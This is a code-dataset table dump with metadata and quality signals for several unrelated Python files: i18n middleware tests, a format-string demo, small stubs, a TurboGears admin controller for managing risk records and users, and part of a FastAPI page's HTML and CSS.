hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
64084a8397e6206d79d3b76e158020320dd77f2b
| 1,887
|
py
|
Python
|
tests/test_middleware.py
|
bigbag/starlette-i18n
|
b185ceb77a7d7d0035953a2569d2b64ea4748494
|
[
"Apache-2.0"
] | 7
|
2021-05-02T00:03:33.000Z
|
2022-01-18T22:06:50.000Z
|
tests/test_middleware.py
|
bigbag/starlette-i18n
|
b185ceb77a7d7d0035953a2569d2b64ea4748494
|
[
"Apache-2.0"
] | 8
|
2021-05-10T23:29:19.000Z
|
2022-02-06T15:19:27.000Z
|
tests/test_middleware.py
|
bigbag/starlette-i18n
|
b185ceb77a7d7d0035953a2569d2b64ea4748494
|
[
"Apache-2.0"
] | 4
|
2021-05-12T06:16:12.000Z
|
2021-07-27T17:09:45.000Z
|
class TestLocaleFromHeader:
def test_success_if_default_locale(self, client):
response = client.get("/locale/", headers={"Accept-Language": "en"})
assert response.status_code == 200
assert response.text == "en"
def test_success_if_custom_locale(self, client):
response = client.get("/locale/", headers={"Accept-Language": "ru"})
assert response.status_code == 200
assert response.text == "ru"
def test_success_if_not_support_locale(self, client):
response = client.get("/locale/", headers={"Accept-Language": "es"})
assert response.status_code == 200
assert response.text == "en"
def test_success_if_empty_locale(self, client):
response = client.get("/locale/")
assert response.status_code == 200
assert response.text == "en"
def test_with_full_header(self, client):
response = client.get("/locale/", headers={"Accept-Language": "es-BR,es;q=0.5,ru;q=0.4"})
assert response.status_code == 200
assert response.text == "ru"
class TestLocaleFromCookie:
def test_success_if_default_locale(self, client):
response = client.get("/locale/", cookies={"Language": "en"})
assert response.status_code == 200
assert response.text == "en"
def test_success_if_custom_locale(self, client):
response = client.get("/locale/", cookies={"Language": "ru"})
assert response.status_code == 200
assert response.text == "ru"
def test_success_if_not_support_locale(self, client):
response = client.get("/locale/", cookies={"Language": "es"})
assert response.status_code == 200
assert response.text == "en"
def test_success_if_empty_locale(self, client):
response = client.get("/locale/")
assert response.status_code == 200
assert response.text == "en"
| 39.3125
| 97
| 0.648649
| 228
| 1,887
| 5.166667
| 0.162281
| 0.213922
| 0.137521
| 0.183362
| 0.935484
| 0.935484
| 0.935484
| 0.935484
| 0.935484
| 0.877759
| 0
| 0.020918
| 0.214626
| 1,887
| 47
| 98
| 40.148936
| 0.773954
| 0
| 0
| 0.736842
| 0
| 0
| 0.110758
| 0.012189
| 0
| 0
| 0
| 0
| 0.473684
| 1
| 0.236842
| false
| 0
| 0
| 0
| 0.289474
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
643c088e0ada9c99c9eb07359405468b848ce8e7
| 353
|
py
|
Python
|
format_specifiers.py
|
pavaniuriti2000/python_files
|
89e3c6bd95af6756b49bc8ee1fa74f900ea6c681
|
[
"MIT"
] | null | null | null |
format_specifiers.py
|
pavaniuriti2000/python_files
|
89e3c6bd95af6756b49bc8ee1fa74f900ea6c681
|
[
"MIT"
] | null | null | null |
format_specifiers.py
|
pavaniuriti2000/python_files
|
89e3c6bd95af6756b49bc8ee1fa74f900ea6c681
|
[
"MIT"
] | null | null | null |
#format specifiers
print("I have {0:d} cats".format(6))
print("I have {0:03d} cats".format(6))
print("I have {0:3d} cats".format(6))
print("I have {3:d} cats".format(6,3,4,7))
print("I have {1:d} cats".format(6,3,4,7))
print("I have {1:04d} cats".format(6,3,4,7))
print("I have {1:f} cats".format(6,3,4,7))
print("I have {2:.2f} cats".format(6,3,4,7))
| 32.090909
| 44
| 0.626062
| 81
| 353
| 2.728395
| 0.234568
| 0.217195
| 0.361991
| 0.271493
| 0.81448
| 0.81448
| 0.656109
| 0.457014
| 0.457014
| 0.348416
| 0
| 0.116352
| 0.09915
| 353
| 10
| 45
| 35.3
| 0.578616
| 0.048159
| 0
| 0
| 0
| 0
| 0.426866
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
ff4a05fec75c8339a5f8d075b74363c0caa88bb9
| 159
|
py
|
Python
|
assertionchain/__init__.py
|
justiniso/AssertionChain
|
8578447904beeae4e18b9390055ac364deef10ca
|
[
"MIT"
] | null | null | null |
assertionchain/__init__.py
|
justiniso/AssertionChain
|
8578447904beeae4e18b9390055ac364deef10ca
|
[
"MIT"
] | 1
|
2015-04-06T02:37:24.000Z
|
2015-04-06T02:42:11.000Z
|
assertionchain/__init__.py
|
justiniso/AssertionChain
|
8578447904beeae4e18b9390055ac364deef10ca
|
[
"MIT"
] | null | null | null |
__version__ = '0.1.1'
# Provide an easier import so users can import via "from assertionchain import AssertionChain"
from assertionchain import AssertionChain
| 39.75
| 94
| 0.81761
| 21
| 159
| 6
| 0.619048
| 0.285714
| 0.380952
| 0.603175
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 0.132075
| 159
| 4
| 95
| 39.75
| 0.891304
| 0.578616
| 0
| 0
| 0
| 0
| 0.075758
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
ff59abb5bedaad448c794b82c75e8655c6a1501f
| 180
|
py
|
Python
|
src/pygame-demo/snek/core/eventlistener.py
|
Adam-Jimenez/python-demo
|
c1d222d88f62a5b6bfdfa01bbbc9e2fdce5a1d6b
|
[
"MIT"
] | null | null | null |
src/pygame-demo/snek/core/eventlistener.py
|
Adam-Jimenez/python-demo
|
c1d222d88f62a5b6bfdfa01bbbc9e2fdce5a1d6b
|
[
"MIT"
] | null | null | null |
src/pygame-demo/snek/core/eventlistener.py
|
Adam-Jimenez/python-demo
|
c1d222d88f62a5b6bfdfa01bbbc9e2fdce5a1d6b
|
[
"MIT"
] | null | null | null |
class EventListener:
def arrow_up(self):
pass
def arrow_down(self):
pass
def arrow_left(self):
pass
def arrow_right(self):
pass
| 12.857143
| 26
| 0.561111
| 22
| 180
| 4.409091
| 0.454545
| 0.329897
| 0.340206
| 0.494845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.366667
| 180
| 13
| 27
| 13.846154
| 0.850877
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0.444444
| 0
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
ff5e2da8c633df0d8ce55f4749cde142a24fb90b
| 308
|
py
|
Python
|
codewars/6kyu/amrlotfy77/up AND down/test_bench.py
|
ictcubeMENA/Training_one
|
dff6bee96ba42babe4888e5cf9a9448a6fd93fc3
|
[
"MIT"
] | null | null | null |
codewars/6kyu/amrlotfy77/up AND down/test_bench.py
|
ictcubeMENA/Training_one
|
dff6bee96ba42babe4888e5cf9a9448a6fd93fc3
|
[
"MIT"
] | 2
|
2019-01-22T10:53:42.000Z
|
2019-01-31T08:02:48.000Z
|
codewars/6kyu/amrlotfy77/up AND down/test_bench.py
|
ictcubeMENA/Training_one
|
dff6bee96ba42babe4888e5cf9a9448a6fd93fc3
|
[
"MIT"
] | 13
|
2019-01-22T10:37:42.000Z
|
2019-01-25T13:30:43.000Z
|
from main import arrange,arrange1
def test1(benchmark):
assert benchmark(arrange,"who hit retaining The That a we taken")== "who RETAINING hit THAT a THE we TAKEN"
def test(benchmark):
assert benchmark(arrange, "who hit retaining The That a we taken") == "who RETAINING hit THAT a THE we TAKEN"
| 34.222222
| 113
| 0.733766
| 49
| 308
| 4.612245
| 0.367347
| 0.088496
| 0.212389
| 0.274336
| 0.80531
| 0.80531
| 0.80531
| 0.80531
| 0.80531
| 0.80531
| 0
| 0.007968
| 0.185065
| 308
| 9
| 114
| 34.222222
| 0.89243
| 0
| 0
| 0.4
| 0
| 0
| 0.478964
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
ffa5a273f4feb3fb12c0c10a8526bba9d7640131
| 20,597
|
py
|
Python
|
comcenterrisk/risk/controllers/adminriskmanagecontroller.py
|
tongpa/bantak_program
|
66edfe225e8018f65c9c5a6cd7745c17ba557bd5
|
[
"Apache-2.0"
] | null | null | null |
comcenterrisk/risk/controllers/adminriskmanagecontroller.py
|
tongpa/bantak_program
|
66edfe225e8018f65c9c5a6cd7745c17ba557bd5
|
[
"Apache-2.0"
] | null | null | null |
comcenterrisk/risk/controllers/adminriskmanagecontroller.py
|
tongpa/bantak_program
|
66edfe225e8018f65c9c5a6cd7745c17ba557bd5
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from tg import TGController
from tg import expose, flash, require, url, lurl, request, redirect, validate, session, response
from tg.i18n import ugettext as _, lazy_ugettext as l_, set_lang,get_lang
from tgext.pluggable import app_model
#from comcenter.model import User, UserRiskSection,RiskManagement,LogviewReport,RiskSection, RiskTeam
#from comcenter.model import SectionListTeam, RiskLevel, RiskTeamType, RiskProgramDetail, RiskProgramGroup, RiskStatus, RiskResponsible
from datetime import datetime
from comcenter.controllers.util.utility import Utility
#from comcenter.controllers.util.exportexcel.risktoexcel import RiskToExcel
import logging;
import sys;
log = logging.getLogger(__name__);
#from repoze.what.predicates import has_permission;
from tg import predicates
from tgext.admin import AdminController;
import logging;
import sys;
log = logging.getLogger(__name__);
__all__ = ['AdminRiskManageController']
class AdminRiskManageController(AdminController):
#allow_only = has_permission('manage');
#allow_only = predicates.has_permission('manage',msg='Only administrators can access.') #.not_anonymous() #
def __init__(self):
self.util = Utility();
self.defaultyear = 2557;
@expose('risk.templates.risk.admin.index')
def index(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
if not request.identity:
login_counter = request.environ.get('repoze.who.logins', 0) + 1
redirect('/login', params=dict(came_from='/', __logins=login_counter))
return dict(page='admin' );
@expose('risk.templates.risk.admin.sectionmanage')
def sectionmanage(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
if not request.identity:
login_counter = request.environ.get('repoze.who.logins', 0) + 1
redirect('/login', params=dict(came_from='/', __logins=login_counter))
return dict(page='admin' );
@expose('risk.templates.risk.admin.sectionteams')
def sectionteams(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
if not request.identity:
login_counter = request.environ.get('repoze.who.logins', 0) + 1
redirect('/login', params=dict(came_from='/', __logins=login_counter))
return dict(page='admin');
@expose('risk.templates.risk.admin.programs')
def programs(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
if not request.identity:
login_counter = request.environ.get('repoze.who.logins', 0) + 1
redirect('/login', params=dict(came_from='/', __logins=login_counter))
return dict(page='admin');
@expose('risk.templates.risk.admin.risklevel')
def riskLevel(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
if not request.identity:
login_counter = request.environ.get('repoze.who.logins', 0) + 1
redirect('/login', params=dict(came_from='/', __logins=login_counter))
return dict(page='admin');
@expose('risk.templates.risk.admin.usermanage')
def usermanage(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
if not request.identity:
login_counter = request.environ.get('repoze.who.logins', 0) + 1
redirect('/login', params=dict(came_from='/', __logins=login_counter))
return dict(page='admin');
@expose('json')
def saveSection(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("create section");
log.info(kw);
self.section_id = self.util.isValue(kw.get('risk_section_id'));
self.section_name = self.util.isValue(kw.get('detail_section'));
if(self.section_id is not None):
log.info("update section");
section = app_model.RiskSection.listBySectionbyId(self.section_id);
section.description = self.section_name;
else:
section = app_model.RiskSection();
log.info("add section");
section.description = self.section_name;
section.save();
print self.section_name
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("create risk");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def deleteSection(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("delete section");
log.info(kw);
self.section_id = self.util.isValue(kw.get('risk_section_id'));
self.section_name = self.util.isValue(kw.get('detail_section'));
if(self.section_id is not None):
log.info("update section");
section = app_model.RiskSection.listBySectionbyId(self.section_id);
section.remove();
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("delete section");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def saveSectionTeam(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("create team");
log.info(kw);
self.section_team_id = self.util.isValue(kw.get('id'));
self.section_team_name = self.util.isValue(kw.get('name'));
self.section_team_type = self.util.isValue(kw.get('type'));
if(self.section_team_id is not None):
log.info("update team");
riskteam = app_model.RiskTeam.getById(self.section_team_id);
riskteam.description = self.section_team_name;
riskteam.risk_team_type_id = self.section_team_type;
else:
riskteam = app_model.RiskTeam();
log.info("add team");
riskteam.description = self.section_team_name;
riskteam.risk_team_type_id = self.section_team_type;
riskteam.save();
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("create risk");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def deleteSectionTeam(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("delete section");
log.info(kw);
self.section_team_id = self.util.isValue(kw.get('id'));
self.section_team_name = self.util.isValue(kw.get('name'));
self.section_team_type = self.util.isValue(kw.get('type'));
if(self.section_team_id is not None):
log.info("delete section team");
section = app_model.RiskTeam.getById(self.section_team_id);
section.remove();
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("delete section team");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def savePrograms(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("create team");
log.info(kw);
self.programs_id = self.util.isValue(kw.get('id'));
self.programs_name = self.util.isValue(kw.get('name'));
self.programs_type = self.util.isValue(kw.get('type'));
if(self.programs_id is not None):
log.info("update team");
riskteam = app_model.RiskProgramDetail.getById(self.programs_id);
riskteam.description = self.programs_name;
riskteam.risk_program_group_id = self.programs_type;
else:
riskteam = app_model.RiskProgramDetail();
log.info("add team");
riskteam.description = self.programs_name;
riskteam.risk_program_group_id = self.programs_type;
riskteam.save();
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("create risk");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def deletePrograms(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("delete section");
log.info(kw);
self.programs_id = self.util.isValue(kw.get('id'));
self.programs_name = self.util.isValue(kw.get('name'));
self.programs_type = self.util.isValue(kw.get('type'));
if(self.programs_id is not None):
log.info("delete section team");
section = app_model.RiskProgramDetail.getById(self.programs_id);
section.remove();
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("delete section team");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def saveRiskLevel(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("create Risk Level");
log.info(kw);
self.id = self.util.isValue(kw.get('id'));
self.name = kw.get('name');
self.type = self.util.isValue(kw.get('type'));
self.eff = self.util.isValue(kw.get('eff'));
if(self.id is not None):
log.info("update Risk Level");
obj = app_model.RiskLevel.getById(self.id);
log.info( "name : " + str(self.name));
obj.description = self.name;
obj.effective = self.eff;
obj.risk_program_group_id = self.type;
if self.type == 1:
obj.is_clinical = self.type;
obj.is_physical = 0;
else:
obj.is_clinical = self.type;
obj.is_physical = 1;
else:
obj = app_model.RiskLevel();
log.info("add Risk Level");
obj.description = self.name;
obj.effective = self.eff;
obj.risk_program_group_id = self.type;
if self.type == 1:
obj.is_clinical = self.type;
obj.is_physical = 0;
else:
obj.is_clinical = self.type;
obj.is_physical = 1;
obj.save();
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("create risk");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def deleteRiskLevel(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("delete risklevel");
log.info(kw);
self.id = self.util.isValue(kw.get('id'));
self.name = self.util.isValue(kw.get('name'));
self.type = self.util.isValue(kw.get('type'));
self.eff = self.util.isValue(kw.get('eff'));
if(self.id is not None):
log.info("delete risklevel");
obj = app_model.RiskLevel.getById(self.id);
obj.remove();
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("delete risklevel");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def saveUser(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("create Risk Level");
log.info(kw);
self.id = self.util.isValue(kw.get('id'));
self.name = self.util.isValue(kw.get('name'));
self.email = self.util.isValue(kw.get('email'));
self.display = self.util.isValue(kw.get('display'));
self.group_id = self.util.isValue(kw.get('group_id'));
self.password = self.util.isValue(kw.get('password'));
self.verify_password = self.util.isValue(kw.get('verify_password'));
if(self.id is not None):
log.info("update Risk Level");
obj = app_model.User.getById(self.id);
obj.user_name = self.name;
obj.email_address = self.email;
obj.display_name = self.display;
if(self.password is not None and self.verify_password is not None and
self.password == self.verify_password):
obj._set_password(self.password);
group = app_model.Group.updateUserGroup(self.id,self.group_id);
log.info("update group_user : " + str(group));
else:
#check User
obj = app_model.User.by_user_name(self.name);
if obj is None:
obj = app_model.User.by_email_address(self.email);
if obj is None:
obj = User();
log.info("add Risk Level");
obj.user_name = self.name;
obj.email_address = self.email;
obj.display_name = self.display;
if(self.password is not None and self.verify_password is not None and
self.password == self.verify_password):
obj._set_password(self.password);
obj.save();
group = app_model.Group.insertUserGroup(obj.user_id,self.group_id);
log.info("insert group_user : " + str(group));
else:
self.message = "email :" + self.email + " มีในระบบแล้ว";
self.success = False;
else:
self.message = "user :" + self.name + " มีในระบบแล้ว";
self.success = False;
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("create risk");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def deleteUser(self,**kw):
reload(sys);
sys.setdefaultencoding("utf-8");
self.message ="sucess";
self.success = True;
try:
log.info("delete risklevel");
log.info(kw);
self.id = self.util.isValue(kw.get('id'));
self.name = self.util.isValue(kw.get('name'));
self.email = self.util.isValue(kw.get('email'));
self.display = self.util.isValue(kw.get('display'));
self.group_id = self.util.isValue(kw.get('group_id'));
self.password = self.util.isValue(kw.get('password'));
self.verify_password = self.util.isValue(kw.get('verify_password'));
if(self.id is not None):
log.info("delete User");
obj = app_model.User.getById(self.id);
obj.remove();
log.info("delete User group");
app_model.Group.removeUserGroup(self.id);
except Exception, exception:
log.info("error : " + str(exception));
print exception;
self.message ="fail";
self.success = False;
log.info("delete risklevel");
log.info(kw);
return dict(success=self.success, message = self.message);
@expose('json')
def listUser(self,**kw):
#users = DBSession.query(User).all();
groups = app_model.DBSession.query(app_model.Group).all();
self.list = [];
for group in groups:
for guser in group.users:
self.list.append({'id' : guser.user_id ,
'name' : guser.user_name,
'display' : guser.display_name,
'email' : guser.email_address,
'group_id' : group.group_id,
'group' : group.group_name
});
return dict(root = self.list,total=str(len(self.list)));
@expose('json')
def listGroupUser(self,**kw):
groups = app_model.DBSession.query(app_model.Group).all();
self.listgroup = [];
for group in groups:
self.listgroup.append({'id' : group.group_id ,
'name' : group.group_name
});
return dict(root = self.listgroup,total=str(len(self.listgroup)));
@expose('comcenter.templates.risk.admin.admin2')
def admin2(self,**kw):
return dict(page='risk' );
@expose('comcenter.templates.risk.admin.admin3')
def admin3(self,**kw):
return dict(page='risk' );
@expose('comcenter.templates.risk.admin.admin4')
def admin4(self,**kw):
return dict(page='risk' );
| 36.584369
| 136
| 0.502161
| 2,053
| 20,597
| 4.939601
| 0.091086
| 0.047628
| 0.054728
| 0.062025
| 0.809092
| 0.781678
| 0.77162
| 0.749827
| 0.724583
| 0.7234
| 0
| 0.003675
| 0.379133
| 20,597
| 563
| 137
| 36.584369
| 0.789021
| 0.027625
| 0
| 0.804762
| 0
| 0
| 0.08697
| 0.017939
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.02381
| 0.028571
| null | null | 0.02619
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ffad4bee309be0de0115e543704f215741feeec9
| 61,843
|
py
|
Python
|
main.py
|
harsh-vt/IITPKD
|
80c72b4281df86c261dca0537346b0d8fb64adc9
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
harsh-vt/IITPKD
|
80c72b4281df86c261dca0537346b0d8fb64adc9
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
harsh-vt/IITPKD
|
80c72b4281df86c261dca0537346b0d8fb64adc9
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import pandas as pd
from fastapi import FastAPI
from pydantic import BaseModel
from fastapi.responses import HTMLResponse, JSONResponse
from fastapi.staticfiles import StaticFiles
from typing import Optional
main_html_content = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Find My Route</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
<!--meta http-equiv="refresh" content="5"-->
</head>
<style>
.main {
padding: 10px;
font-size: 20px;
/* Increased text to enable scrolling */
padding: 0px 10px;
min-height: 100%;
}
body {
height: 97%;
min-height: 97%;
font-family: 'Roboto', sans-serif;
background: #d9eeff;
overflow: hidden;
}
.controls {
width: 20%;
padding: 12px 20px;
margin: 8px 0;
box-sizing: border-box;
border-radius: 25px;
}
.controls:focus {
border: 4px solid #555;
}
#submit{
background-color: skyblue;
}
.top_banner {
text-align: center;
}
#main-data-table{
margin-left: auto;
margin-right: auto;
}
.flex-container {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
}
.flex-child {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
}
.flex-container-second {
min-height: 80%;
display: flex;
border-radius: 25px;
text-align: center;
justify-content: center;
flex-direction: column;
}
.flex-first-child-main {
flex: 1;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-main thead th { position: sticky; top: 0; z-index: 1; }
.flex-first-child-second {
flex: auto;
align-self: center;
border-radius: 25px;
margin-right: 10px;
overflow: auto;
height: 200px;
}
.flex-first-child-second thead th { position: sticky; top: 0; z-index: 1; }
table { border-collapse: collapse; width: 100%; }
th, td { padding: 2px 30px; }
th { background:#eee; }
.second_child{
border-radius: 25px;
width: 200px;
flex: auto;
height: 500px;
}
#map {
align-self: center;
border-radius: 25px;
height: 500px;
width: 100%;
flex: auto;
flex-basis: 0;
flex-grow: 4;
}
.second_col_legend{
align-self: center;
border-radius: 25px;
width: 100%;
margin-right: 20px;
}
</style>
<body>
